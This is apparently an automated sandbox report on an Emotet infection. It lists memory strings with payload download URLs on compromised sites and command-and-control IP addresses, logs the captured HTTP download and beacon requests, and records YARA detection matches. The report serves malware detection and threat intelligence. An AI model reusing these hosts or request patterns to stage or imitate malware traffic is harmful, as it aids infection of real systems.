        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846725000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1863481873.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D8466F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/_
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
        Source: wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.co
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/4
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/P
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/Y
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/)
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/M
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/)
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/l
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
        Source: wscript.exe, 00000001.00000003.1537553114.000002D84656F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542696917.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540601110.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1534710579.000002D846568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1545756551.000002D846570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D84672F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/0w
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/l
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
        Source: wscript.exe, 00000001.00000002.1554710807.000002D846747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/s
        Source: unknownHTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
        Source: unknownDNS traffic detected: queries for: penshorn.org
        Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
        Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
        Source: global trafficHTTP traffic detected: GET /logs/pd/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.gomespontes.com.br
        Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected Emotet
        Source: Yara matchFile source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
